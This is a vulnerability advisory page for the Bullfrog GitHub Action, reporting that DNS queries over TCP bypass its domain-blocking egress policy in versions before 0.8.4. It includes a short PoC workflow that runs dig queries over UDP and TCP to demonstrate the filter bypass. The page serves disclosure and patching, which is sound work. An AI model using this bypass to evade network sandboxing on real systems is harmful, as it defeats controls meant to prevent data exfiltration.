Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1tMzJmLWZqdzItMzd2M84ABH5K

Moderate EPSS: 0.00048% (0.14712 Percentile) EPSS:
Permalink JSON

Bullfrog's DNS over TCP bypasses domain filtering

Affected Packages Affected Versions Fixed Versions
actions:bullfrogsec/bullfrog < 0.8.4 0.8.4

Summary

Using tcp breaks blocking and allows DNS exfiltration.

PoC

name: test
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: Use google dns
        run: |
          sudo resolvectl dns eth0 1.1.1.1
          resolvectl status
      - name: Set up bullfrog to block everything
        uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
        with:
           egress-policy: block
           allowed-domains: |
             *.github.com
      - name: Test connectivity
        run: |
          echo testing udp allowed ..
          dig api.github.com @1.1.1.1 || :
          echo testing tcp allowed ..
          dig api.github.com @1.1.1.1 +tcp || :

          echo testing udp not allowed
          dig api.google.com @1.1.1.1 || :
          echo testing tcp not allowed
          dig api.google.com @1.1.1.1 +tcp || :

Impact

sandbox bypass

image

References:

Identifiers

GHSA-m32f-fjw2-37v3

CVE-2025-47775

Risk

Severity

Moderate

EPSS

EPSS Percentage: 0.00048

EPSS Percentile: 0.14712

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/bullfrogsec/bullfrog

Date and time

Published

3 months ago

Updated

3 months ago

API

JSON